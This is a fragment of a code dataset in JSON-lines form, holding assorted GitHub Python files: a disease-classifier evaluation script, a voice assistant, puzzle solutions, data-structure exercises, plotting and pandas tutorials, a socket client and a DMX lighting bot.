directories\r\n patchDir = scriptInputs['patchDir']\r\n modelDir= scriptInputs['modelDir']\r\n resultsDir= scriptInputs['resultsDir']\r\n regenerateData = scriptInputs['regenerateData']\r\n figureDir = scriptInputs['figureDir']\r\n \r\n \r\n # %% Run analysis to apply both CTX and WM disease classifiers on all test folds (Fig 5b)\r\n if regenerateData == True:\r\n regionTypes=['CTX','WM']\r\n results={}\r\n for region in regionTypes:\r\n # Create variables\r\n results[region]={}\r\n #What fraction of patches were correctly classified?\r\n results[region]['slideAcc'] = np.zeros([49,2])\r\n # What is the class composition of each slide\r\n results[region]['slideComp'] = np.zeros([49,3])\r\n # Confusion matrix\r\n results[region]['confMatTotal'] = np.zeros([3,3,3])\r\n #Counter to keep track\r\n compCount=0 \r\n #milSlideIdx\r\n results[region]['milSlideList'] = []\r\n \r\n \r\n for foldNumber in range(1,4):\r\n # foldNumber=1\r\n print(foldNumber)\r\n foldsDir=os.path.join(patchDir,region,'Folds')\r\n \r\n testHdf5File=os.path.join(foldsDir,'Testing'+str(foldNumber)+'.txt')\r\n \r\n testHdf5List=[line.rstrip('\\n') for line in open(testHdf5File)]\r\n testSlideDiseaseList=[os.path.split(h)[-1].split('_')[0] for h in testHdf5List]\r\n \r\n milSlideName = [x.split('/',)[-1] for x in testHdf5List]\r\n results[region]['milSlideList'] =results[region]['milSlideList']+milSlideName\r\n classDict={'AD':0,'CBD':1,'PSP':2}\r\n \r\n testPatches,testAnnoLabels,temp,testSlideNumbers,testPatchPos=\\\r\n pg.LoadPatchData(testHdf5List,returnSampleNumbers=True,returnPatchCenters=True)\r\n testPatches=testPatches[0]\r\n testDiseaseNames,testDiseaseNumbers=np.unique(testSlideDiseaseList,return_inverse=True)\r\n testClasses=testDiseaseNumbers[np.uint8(testSlideNumbers)]\r\n \r\n # % Load Model ---------------------------------\r\n milModelFile = os.path.join(modelDir,'mil_DiseaseClassifier_'+region+'_E3_Fold' \r\n + str(foldNumber)+ '.h5') \r\n model=load_model(milModelFile,compile=False,custom_objects=\\\r\n {'Normalize_Layer':mil.Normalize_Layer,\r\n 'Last_Sigmoid':mil.Last_Sigmoid,\r\n 'Last_Softmax':mil.Last_Softmax})\r\n \r\n # % Apply model to testing data------------------------------\r\n numberOfClasses=len(classDict)#train\r\n \r\n nPatchesPerSlide=1000\r\n numberOfTestSlides=len(np.unique(testSlideNumbers))\r\n testIdxToProfile=[]\r\n for slideNumber in range(numberOfTestSlides):\r\n testSlideIdx = np.random.choice(np.where(testSlideNumbers==slideNumber)[0],nPatchesPerSlide)#N\r\n testIdxToProfile.append(testSlideIdx)#N\r\n\r\n testIdxToProfile=np.array(testIdxToProfile).flatten()\r\n \r\n classResponses=model.predict(testPatches[testIdxToProfile]/255,verbose=1)\r\n predClasses=np.argmax(classResponses,axis=-1)\r\n \r\n confMat=confusion_matrix(testClasses[testIdxToProfile], predClasses)\r\n results[region]['confMatTotal'][:,:,foldNumber-1] = confMat.astype('float') / confMat.sum(axis=1)[:, np.newaxis] \r\n gtClass = testClasses[testIdxToProfile]\r\n \r\n for slideNumber in range(numberOfTestSlides):\r\n isInSlide=testSlideNumbers[testIdxToProfile]==slideNumber\r\n slideCompFull = np.argmax(classResponses[isInSlide,:],axis=-1)\r\n gtComp = gtClass[isInSlide]\r\n correctComp = np.uint((gtComp-slideCompFull)==0)\r\n results[region]['slideAcc'][compCount,0] = np.sum(correctComp)/nPatchesPerSlide\r\n results[region]['slideAcc'][compCount,1] = gtComp[0]\r\n n = plt.hist(slideCompFull,[0,1,2,3])\r\n results[region]['slideComp'][compCount] = n[0]/1000\r\n compCount = compCount+1\r\n \r\n \r\n # %Save Results here\r\n resultsSaveFile = 'milResults'\r\n save_dict(results,resultsSaveFile,resultsDir)\r\n else:\r\n \r\n # % Or load previous results\r\n resultsLoadFile = 'milResults'\r\n results = load_dict(resultsLoadFile,resultsDir)\r\n \r\n \r\n # % Plot all confusion matrices (Fig 5b)---------------------------------------\r\n print('Generating disease classification accuracy (Fig 5b, S8)') \r\n labels = ['AD', 'CBD','PSP']\r\n fig= plt.figure(figsize=(20,10))\r\n for regionCounter,region in enumerate(results):\r\n plt.subplot(1,2,regionCounter+1)\r\n plot_avg_confusion_matrix(results[region]['confMatTotal'],\r\n labels,normalize=True,\r\n title = region) \r\n fig.savefig(figureDir+'Figure5B.png')\r\n \r\n \r\n # % Compare CTX and WM accuracy (Fig S8a)-------------------------------------\r\n nBins=4\r\n hist2d,xBins,yBins=np.histogram2d(results['CTX']['slideAcc'][:,0],\r\n results['WM']['slideAcc'][:,0],\r\n bins=nBins,\r\n range=[[0,1],[0,1]])\r\n fig= plt.figure(figsize=(7,7))\r\n sns.heatmap(hist2d,annot=True,cmap='Wistia')\r\n plt.ylim(0,nBins+0.5) \r\n \r\n plt.plot([nBins/2,nBins/2],[0,nBins],'--k')\r\n plt.plot([0,nBins],[nBins/2,nBins/2],'--k')\r\n makePct = lambda pctList: [str(int(p))+'%' for p in pctList]\r\n plt.xticks(xBins*nBins,makePct(100*xBins))\r\n plt.yticks(yBins*nBins,makePct(100*yBins),rotation=0)\r\n plt.xlabel('WM Accuracy')\r\n plt.ylabel('CTX Accuracy')\r\n plt.axis('square')\r\n fig.savefig(figureDir+'FigureS8A.png')\r\n \r\n \r\n # %Compare accuracy with consensus(Fig S8b)------------------------------------\r\n \r\n \r\n isHitCtx=np.argmax(results['CTX']['slideComp'],axis=1)!=results['CTX']['slideAcc'][:,1]\r\n isHitWm=np.argmax(results['WM']['slideComp'],axis=1)!=results['WM']['slideAcc'][:,1]\r\n isHitCons=np.argmax(results['CTX']['slideComp']+results['WM']['slideComp'],\r\n axis=1)!=results['WM']['slideAcc'][:,1]\r\n \r\n \r\n isHit=np.hstack([isHitWm,isHitCtx,isHitCons])\r\n disease=np.hstack([results['CTX']['slideAcc'][:,1],results['CTX']['slideAcc'][:,1],results['CTX']['slideAcc'][:,1]])\r\n modelType=np.hstack([0*np.ones(isHitWm.shape),1*np.ones(isHitWm.shape),2*np.ones(isHitWm.shape)])\r\n \r\n adCounts= np.array([np.sum(np.logical_and(disease[isHit]==0,modelType[isHit]==m)) for m in range(3)])\r\n pspCounts= np.array([np.sum(np.logical_and(disease[isHit]==2,modelType[isHit]==m)) for m in range(3)])\r\n cbdCounts= np.array([np.sum(np.logical_and(disease[isHit]==1,modelType[isHit]==m)) for m in range(3)])\r\n \r\n fig= plt.figure(figsize=(7,7))\r\n plt.bar(np.arange(3),adCounts,color='R')\r\n plt.bar(np.arange(3),pspCounts,bottom=adCounts,color='b')\r\n plt.bar(np.arange(3),cbdCounts,bottom=adCounts+pspCounts,color='g')\r\n plt.xticks(np.arange(3),['WM','CTX','Consensus'],rotation=0)\r\n plt.yticks(np.arange(5))\r\n plt.ylabel('Misclassified Samples')\r\n fig.savefig(figureDir+'FigureS8B.png')\r\n print('Disease classification figures finished!')\r\n","repo_name":"Rajaram-Lab/anc-2021-dl-wm-tauopathy","sub_path":"Disease_Classification/DiseaseModel_Evaluation.py","file_name":"DiseaseModel_Evaluation.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37352806648","text":"import pyttsx3 #pip install pyttsx3\nimport speech_recognition as sr # pip install speechRegonition\nimport datetime\nimport wikipedia # pip install wikipedia\nimport webbrowser\nimport os\nimport smtplib\nfrom time import sleep\n\nengine = pyttsx3.init(\"sapi5\")\nvoices = engine.getProperty(\"voices\")\nvolume = engine.getProperty(\"volume\")\nspeak_velocity = engine.getProperty(\"rate\")\nassistant_name = \"Yummi\"\nuser_path_name = \"Nilcy Marinho\"\n\nengine.setProperty(\"voice\", voices[1].id)\nengine.setProperty(\"rate\", 170)\n\ndef speak(text=\"there is nothing to say\"):\n \"\"\"\n Write anything that you want your assistant to say.\n\n :param text: The text you want to pass to your assistant\n \"\"\"\n engine.say(text)\n engine.runAndWait()\n\n\ndef wish_me():\n \"\"\"\n This function control the way your assistant will wish you\n \"\"\"\n hour = int(datetime.datetime.now().hour)\n\n if hour > 6 and hour < 12:\n speak(\"Good Morning Master\")\n elif hour >= 12 and hour < 18:\n speak(\"Good Afternoon Master\")\n elif hour >= 18 and hour <= 23:\n speak(\"Good Evening Master\")\n else:\n speak(\"It's midnight, nice to see you master\")\n\n\ndef take_command():\n command = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n command.adjust_for_ambient_noise(source)\n audio = command.listen(source)\n\n try:\n print(\"Recognizing...\")\n query = command.recognize_google(audio, language=\"en-us\")\n print(f\"User said: {query}\\n\")\n except Exception as error:\n speak(\"Sorry, I didn't understand\")\n query = \"\"\n finally:\n return query\n\n \nprint(f\"Initializing {assistant_name}...\")\nsleep(0.5)\nwish_me()\nquery = take_command()\n\nif \"wikipedia\" in query.lower():\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=2)\n print(results)\n speak(results)\nelif \"open code\" in query.lower():\n speak(\"opening code\")\n code_path=f\"C:\\\\Users\\\\{user_path_name}\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\n\nelif \"open youtube\" in query.lower():\n speak(\"opening youtube\")\n webbrowser.open(\"https:/youtube.com\", new=2)\nelif \"open google\" in query.lower():\n speak(\"opening google\")\n webbrowser.open(\"https:/google.com\", new=2)\nelif \"open github\" in query.lower():\n speak(\"opening github\")\n webbrowser.open(\"https:/github.com\", new=2)\n\nelif \"chill your mind\" in query.lower():\n speak(\"opening chill your mind radio\")\n webbrowser.open(\"https://www.youtube.com/watch?v=eQdA8dvsgQs\", new=2)\nelif \"play lo-fi\" in query.lower():\n speak(\"opening lo-fi radio\")\n webbrowser.open(\"https://www.youtube.com/watch?v=5qap5aO4i9A\", new=2)\n\nelif \"time now\" in query.lower():\n hour = datetime.datetime.now().hour\n minute = datetime.datetime.now().minute\n print(f\"It is {hour} hours and {minute} minutes\")\n speak(f\"It is {hour} hours and {minute} minutes\")\n \n\nsleep(2)\nos.system(\"cls\")\n","repo_name":"Thiagomrfs/Yummi-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34460975949","text":"def check(bus, n):\n\tfor b in bus:\n\t\t#print('\\t' + str((t+b[1]) % b[0]))\n\t\tif not (t + b[1]) % b[0] == 0:\n\t\t\treturn False\n\treturn True\n\n\nwith open('input.txt') as file:\n\tfile.readline()\n\tdata = []\n\tfor b in file.readline().strip('\\n').split(','):\n\t\tif b == 'x':\n\t\t\tdata.append(1)\n\t\telse:\n\t\t\tdata.append(int(b))\n\ndata = [[b, data.index(b)] for b in data if not b == 1]\n\n\nstep = 1\nt = 0\ntodo = data\nstop = False\n\nwhile todo:\n\tprint(t)\n\tt += step\n\tif check([todo[0]], t):\n\t\tstep *= todo[0][0]\n\t\tdel todo[0]\n\nprint(t)\n","repo_name":"Marval13/aoc","sub_path":"2020/13/13b.py","file_name":"13b.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31729057685","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Stack:\n def __init__(self, value):\n node = Node(value)\n self.top = node\n self.height = 1\n\n def all(self):\n temp = self.top\n while temp is not None:\n print(temp.value)\n temp = temp.next\n\n def push(self, value):\n node = Node(value)\n if self.top is None:\n self.top = node\n self.height+=1\n\n node.next = self.top\n self.top = node\n self.height+=1\n \n def pop(self):\n if self.top is None:\n return None\n temp = self.top\n self.top = temp.next\n temp.next = None\n temp = None\n self.height-=1\n\nstack = Stack(2)\nstack.push(4)\nstack.pop()\nstack.all()","repo_name":"anice1/Data-Structures","sub_path":"Stacks.py","file_name":"Stacks.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9108788501","text":"import string\nimport argparse\n\ndef main():\n\n\tparser = argparse.ArgumentParser('\\n\\nQuesto tool converte solo REF e ALT nel vcf in UPPERCASE per il vcf di BCFTOOLS\\n')\n\tparser.add_argument('-I','--input',help=\"Input file in formato .vcf\")\n\t#parser.add_argument('-O','--outfile',help=\"File di output in vcf format\")\n\n\tglobal opts\n\topts = parser.parse_args()\n\n\twith open(opts.input) as vcf:\n\n\t\tfor line in vcf:\n\n\t\t\tif line.startswith('#'):\n\n\t\t\t\tout.write(line)\n\n\t\t\telse:\n\n\t\t\t\tline = line.rstrip()\n\t\t\t\tline = line.split('\\t')\n\t\t\t\tline[3]=line[3].upper()\n\t\t\t\tline[4]=line[4].upper()\n\n\t\t\t\tout.write('\\t'.join(line) + '\\n')\n\t\t\t\t\n\n\tout.close()\n\nmain()","repo_name":"urtism/CMG","sub_path":"SCRIPT_CMG/SCRIPT_PYTHON/FILE_MANIPULATION/Convert-Ref-Alt-To-UPPER.py","file_name":"Convert-Ref-Alt-To-UPPER.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33971005900","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 8 14:28:43 2022\r\n\r\n@author: kimyelim\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.special as sci\r\nxmin=0\r\nresolution=100\r\nx=np.linspace(xmin,resolution)\r\nprint(x)\r\nC=1-sci.erf(x/(4*10000000*0.000001)**0.5)\r\nC2=1-sci.erf(x/(4*10000000*0.0001)**0.5)\r\nC3=1-sci.erf(x/(4*10000000*0.01)**0.5)\r\nC4=1-sci.erf(x/(4*10000000*10)**0.5)\r\nprint(C)\r\nfig=plt.figure(dpi=1000)\r\ncm=1/2.54\r\nfig,ax=plt.subplots(figsize=(19*cm,15*cm))\r\nax.plot(x,C)\r\nax.plot(x,C2)\r\nax.plot(x,C3)\r\nax.plot(x,C4)\r\nfontname={'fontname':'Times New Roman'}\r\nplt.xlabel(\"x\",fontsize=15,**fontname)\r\nplt.ylabel(\"C\",fontsize=15,**fontname)\r\nplt.xticks(np.arange(min(x),max(x),100),fontsize=10,**fontname)\r\nplt.xlim([0,100])\r\nplt.yticks(np.arange(0,1,0.1),fontsize=10,**fontname)\r\nplt.ylim([-0.6,1.1])\r\nplt.legend([r'$C(t=0.000001)=1-erf(x/\\sqrt{(4Dt)})$',r'$C2(t=0.0001)=1-erf(x/\\sqrt{(4Dt)})$',r'$C3(t=0.01)=1-erf(x/\\sqrt{(4Dt)})$',r'$C4(t=10)=1-erf(x/\\sqrt{(4Dt)})$'],loc='lower right')\r\nplt.title(\"density\",fontsize=20,**fontname)\r\nfig.savefig('plot_density.png',format='png',bbox_inches='tight',dpi=1000)","repo_name":"kimyelim00/test_1","sub_path":"untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32483876990","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:percent,md\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.3.0\n# kernelspec:\n# display_name: modern-pandas\n# language: python\n# name: modern-pandas\n# ---\n\n# %% [markdown] Collapsed=\"false\"\n# # 1. Modern Pandas\n\n# %% [markdown] Collapsed=\"false\"\n# ## Get data\n\n# %% [markdown] Collapsed=\"false\"\n# Just downloading data here. Feel free to ignore 😅.\n\n# %% Collapsed=\"false\"\nimport os\nimport zipfile\n\nimport requests\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# %% Collapsed=\"false\"\nheaders = {\n \"Referer\": \"https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236&DB_Short_Name=On-Time\",\n \"Origin\": \"https://www.transtats.bts.gov\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n}\n\nparams = (\n (\"Table_ID\", \"236\"),\n (\"Has_Group\", \"3\"),\n (\"Is_Zipped\", \"0\"),\n)\n\nwith open(\"modern-1-url.txt\", encoding=\"utf-8\") as f:\n data = f.read().strip()\n\nos.makedirs(\"data\", exist_ok=True)\ndest = \"data/flights.csv.zip\"\n\nif not os.path.exists(dest):\n r = requests.post(\n \"https://www.transtats.bts.gov/DownLoad_Table.asp\",\n headers=headers,\n params=params,\n data=data,\n stream=True,\n )\n\n with open(\"data/flights.csv.zip\", \"wb\") as f:\n for chunk in r.iter_content(chunk_size=102400):\n if chunk:\n f.write(chunk)\n\n# %% Collapsed=\"false\"\nzf = zipfile.ZipFile(\"data/flights.csv.zip\")\nfp = zf.extract(zf.filelist[0].filename, path=\"data/\")\ndf = pd.read_csv(fp, parse_dates=[\"FL_DATE\"]).rename(columns=str.lower)\n\ndf.info()\n\n# %% [markdown] Collapsed=\"false\"\n# ## Index\n\n# %% [markdown] Collapsed=\"false\"\n# Two methods to get rows:\n#\n# 1. Use `.loc` for label-based indexing\n# 2. Use `.iloc` for positional indexing\n\n# %% Collapsed=\"false\"\nfirst = df.groupby(\"unique_carrier\").first()\n\n# %% Collapsed=\"false\"\nfirst.loc[[\"AA\", \"AS\", \"DL\"], [\"fl_date\", \"tail_num\"]]\n\n# %% Collapsed=\"false\"\nfirst.iloc[[0, 1, 3], [0, 1]]\n\n# %% [markdown] Collapsed=\"false\"\n# ## SettingWithCopy\n\n# %% [markdown] Collapsed=\"false\"\n# Do not let the ends of two square brackets touch `][`. This does _not_ result in an an assignment to column `\"b\"`:\n#\n# ```python\n# # This is bad, do not do\n# f[f[\"a\"] <= 3][\"b\"] = f[f[\"a\"] <= 3][\"b\"] / 10\n# ```\n\n# %% Collapsed=\"false\"\n# Correct way\nf = pd.DataFrame({\"a\": [1, 2, 3, 4, 5], \"b\": [10, 20, 30, 40, 50]})\nf.loc[f[\"a\"] <= 3, \"b\"] = f.loc[f[\"a\"] <= 3, \"b\"] / 10\nf\n\n# %% [markdown] Collapsed=\"false\"\n# ## Multidimensional indexing\n\n# %% [markdown] Collapsed=\"false\"\n#
\n# Techniques of note\n#

\n#
  • pd.IndexSlice for easy slicing of MultiIndexes
  • \n#
    \n\n# %% Collapsed=\"false\"\nhdf = df.set_index(\n [\"unique_carrier\", \"origin\", \"dest\", \"tail_num\", \"fl_date\"]\n).sort_index()\nhdf[hdf.columns[:4]].head()\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting outermost index\n\n# %% Collapsed=\"false\"\nhdf.loc[[\"AA\", \"DL\", \"US\"], [\"dep_time\", \"dep_delay\"]]\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting first two using a tuple `()`.\n\n# %% Collapsed=\"false\"\nhdf.loc[([\"AA\", \"DL\", \"US\"], [\"ORD\", \"DSM\"]), [\"dep_time\", \"dep_delay\"]]\n\n# %% [markdown] Collapsed=\"false\"\n# Selecting only second index using `pd.IndexSlice`.\n\n# %% Collapsed=\"false\"\nhdf.loc[pd.IndexSlice[:, [\"ORD\", \"DSM\"]], [\"dep_time\", \"dep_delay\"]]\n\n# %% Collapsed=\"false\"\npd.IndexSlice[:, ['ORD', 'DSM']]\n\n# %% Collapsed=\"false\"\n","repo_name":"paw-lu/modern-pandas","sub_path":"modern-pandas/1_intro.py","file_name":"1_intro.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"25098180784","text":"import jatekvezerles\r\n\r\n#Ranglista fájl beolvasása meghívja a játékos_adatok osztályt és ilyen listát hoz létre melyet rendezz összeg szerint\r\ndef ranglista_beolvas():\r\n try:\r\n f = open(\"ranglista.txt\",\"rt\",encoding=\"utf-8\")\r\n lista =[]\r\n for sor in f:\r\n sor = sor.rstrip(\"\\n\")\r\n darabok = sor.split(\":\")\r\n adat = jatekvezerles.jatekos_adatok(darabok[0],darabok[1],darabok[2])\r\n lista.append(adat)\r\n f.close()\r\n lista.sort(key=lambda x: x.osszeg,reverse=True)\r\n return lista\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (ranglista.txt)\", e)\r\n\r\n#Eredmények kiírása a ranglistába\r\ndef ranglista_kiir(lista):\r\n try:\r\n f = open(\"ranglista.txt\",\"a+\",encoding=\"utf-8\")\r\n for i in lista:\r\n f.write(\"\\n\")\r\n f.write(\"{}:{}:{}\".format(i.nev,i.nehezseg,i.osszeg))\r\n f.close()\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (ranglista.txt)\",e)\r\n\r\n#Kerdesek beolvasása egy kerdes osztályú listát ad vissza\r\ndef kerdesek_beolvas():\r\n try:\r\n f = open(\"kerdesek.txt\",\"rt\",encoding=\"utf-8\")\r\n lista =[]\r\n for sor in f:\r\n darabok = sor.split(\"\\t\")\r\n adat = jatekvezerles.kerdes_adatok(int(darabok[0]), darabok[1], darabok[2], darabok[3], darabok[4], darabok[5], darabok[6], darabok[7])\r\n lista.append(adat)\r\n f.close()\r\n return lista\r\n except FileNotFoundError as e:\r\n print(\"Nem található a fájl (kerdesek.txt)\", e)\r\n\r\n\r\n\r\n\r\n","repo_name":"varben685/apiramis","sub_path":"fajlkezeles.py","file_name":"fajlkezeles.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19102523237","text":"#!/usr/bin/env python3\nimport sys\nfrom collections import deque, Counter\nfrom heapq import heappop, heappush\nfrom bisect import bisect_right\nfrom itertools import accumulate\n\nsys.setrecursionlimit(10**6)\nINF = 10**12\nm = 10**9 + 7\n\n\ndef main():\n T = int(input())\n for _ in range(T):\n ax, ay, bx, by, cx, cy = map(int, input().split())\n minx = min([ax, bx, cx])\n miny = min([ay, by, cy])\n # print(minx, miny)\n\n # 完成位置の石の向きを調べる\n ax -= minx\n bx -= minx\n cx -= minx\n ay -= miny\n by -= miny\n cy -= miny\n d = {(0, 0), (0, 1), (1, 0), (1, 1)} # 石がない場所\n d -= {(ax, ay)}\n d -= {(bx, by)}\n d -= {(cx, cy)}\n d = list(d)\n z = d[0][0] + d[0][1]*2\n s = 3 # 初期位置の石の向き\n # print(z)\n\n # 石の位置を第一象限に写す\n if minx >= 0 and miny < 0:\n miny = -miny\n z = [2, 3, 0, 1][z]\n s = 3\n miny -= 1\n elif minx < 0 and miny >= 0:\n minx = -minx\n z = [1, 0, 3, 2][z]\n s = 0\n minx -= 1\n elif minx < 0 and miny < 0:\n minx = -minx\n miny = -miny\n z = [3, 2, 1, 0][z]\n s = 2\n minx -= 1\n miny -= 1\n\n print(minx, miny, z, s)\n\n ans = 0\n if minx == 0 and miny == 0:\n if z != s:\n ans += 1\n else:\n if z != 3:\n ans += 1\n if s == 0:\n ans -= 1\n elif s == 1 and miny > 0:\n ans -= 1\n elif s == 2 and minx > 0:\n ans -= 1\n ans += 3 * min(minx, miny)\n minx -= min(minx, miny)\n miny -= min(minx, miny)\n ans += 2 * max(0, minx-1)\n ans += 2 * max(0, miny-1)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ryu19-1/atcoder_python","sub_path":"arc109/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5400096191","text":"import socket\n\nsexo = input(\"Digite o sexo (M ou F): \")\naltura = float(input(\"Digite a altura (m): \"))\n\nmensagem = sexo + \"\\n\" + str(altura)\n\n#============================\n\nclient = socket.socket()\n\nclient.connect((\"127.0.0.1\", 8888))\n\nbuf = mensagem.encode(\"utf8\")\n\nclient.send(len(buf).to_bytes(4, \"little\"))\nclient.send(buf)\n\n#============================\n\nbuf = bytearray()\n\nwhile len(buf) < 4:\n buf += client.recv(4)\n\nmessage_len = int.from_bytes(buf[0:4], \"little\")\n\nbuf = buf[4:]\n\nwhile len(buf) < message_len:\n buf += client.recv(message_len - len(buf))\n\nmensagem = buf.decode(\"utf8\")\n\n#============================\n\nprint()\nprint(\"Peso Ideal (kg): \" + mensagem)\n\nclient.close()","repo_name":"SD-CC-UFG/leonardo.basilio.sd.ufg","sub_path":"08-23 Lista 1/04-client.py","file_name":"04-client.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43394745637","text":"# %%\n# 10.1 使用函数cv2.Canny()获取图像的边缘,并尝试使用不同的thredshold1和thredshold2,来得到边缘\n\nimport cv2\n\no = cv2.imread(\"lesson_10\\\\danger.png\", cv2.IMREAD_GRAYSCALE)\nr1 = cv2.Canny(o, 150, 220)\nr2 = cv2.Canny(o, 32, 128)\ncv2.imshow(\"original\", o)\ncv2.imshow(\"result1\", r1)\ncv2.imshow(\"result2\", r2)\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"lazy606/myPyOpenCV","sub_path":"lesson_10/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42467637140","text":"# linear search in python\n\n# function for linear search\ndef linearSearch(list, n, key):\n for i in range(0,n):\n if(list[i]==key):\n return i\n return -1\nprint(\"Linear Search in Python\")\nlist1 = [1,3,4,6,12,45]\nkey = int(input(\"Enter the element you want to search: \"))\nn = len(list1)\nret = linearSearch(list1, n, key)\nif(ret == -1):\n print(\"Element not found at any index.\")\nelse:\n print(\"Element found at index \", ret)\nprint() \n\n# Binary Search in Python\n# iterative method\nprint(\"Binary Search in python\")\ndef binarySearch(list, n):\n low = 0\n high = len(list) - 1\n mid = 0\n while low <= high:\n mid = (high+low)//2\n if list[mid]n:\n high = mid - 1\n else:\n return mid\n return -1\n \nlist1 = [12, 23, 3, 45, 67]\nn = 45\nresult = binarySearch(list1, n)\nif result != -1:\n print(\"Element found at index \", result)\nelse:\n print(\"Element not found\") \nprint() \n\n\n# Samragyi Vats\n#-----------------------------","repo_name":"samragyi/2020A1R011_COM-511_python","sub_path":"activity4_September26-2022/activity4_searching.py","file_name":"activity4_searching.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71729254646","text":"import argparse\nimport random\nimport time\nimport math\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\n\nstart_time = time.time()\n\ndef set_red_pulse():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/7\")\n v = time.time() - start_time\n v *= 30\n v /= 2*math.pi\n v = math.sin(v)\n v = math.fabs(v)\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\ndef set_bulb_pulse():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/15\")\n v = time.time() - start_time\n v *= 100\n v /= 2*math.pi\n v = math.sin(v)\n v = math.fabs(v)\n msg.add_arg(v*0.25)\n msg = msg.build()\n client.send(msg)\n\ndef set_green_zero():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/8\")\n msg.add_arg(0)\n msg = msg.build()\n client.send(msg)\n\ndef set_blue_zero():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/9\")\n msg.add_arg(0)\n msg = msg.build()\n client.send(msg)\n\ndef send(receiver, v):\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/\"+str(receiver))\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\ndef set_bulb_noisy():\n base = 0.08\n factor = 0.08\n delay = 0.15\n boost = 0.2\n v = base\n v += (random.random()*factor)\n send(1,v)\n v = base\n v += (random.random()*factor)\n time.sleep(0.01)\n send(2,v)\n v = base\n v += (random.random()*factor)\n time.sleep(0.01)\n send(3,v)\n if random.random() > 0.995:\n delay += random.random()*0.65\n v += boost\n send(1,v)\n time.sleep(delay)\n send(1,0)\n send(2,v)\n time.sleep(delay)\n send(2,0)\n send(3,v)\n time.sleep(delay)\n send(3,0)\n v = base\n v += (random.random()*factor) \n if random.random() > 0.999:\n v += boost\n send(1,v)\n send(2,v)\n send(3,v)\n time.sleep(delay)\n\n\n\n\n\n\n\n\n\ndef set_neon():\n msg = osc_message_builder.OscMessageBuilder(address = \"/dmx/universe/5000/4\")\n v = 0\n flash = False\n if random.random() > 0.991:\n flash = True\n v+=0.8\n msg.add_arg(v)\n msg = msg.build()\n client.send(msg)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"127.0.0.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=7770,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n\n client = udp_client.UDPClient(args.ip, args.port)\n\n start_time = time.time()\n\n while True:\n set_bulb_noisy()\n time.sleep(0.05)\n set_neon()\n time.sleep(0.05)\n\n pass\n\n","repo_name":"bestimmaa/ola-osc-vj-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"3418704197","text":"class Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix:\n return 0\n direction = 0\n moves = [(0, 1), (1, 0), (0, -1), (-1, 0)]\n visited = [[False for x in range(len(matrix[0]))] for y in range(len(matrix))]\n pos = [0, 0]\n order = 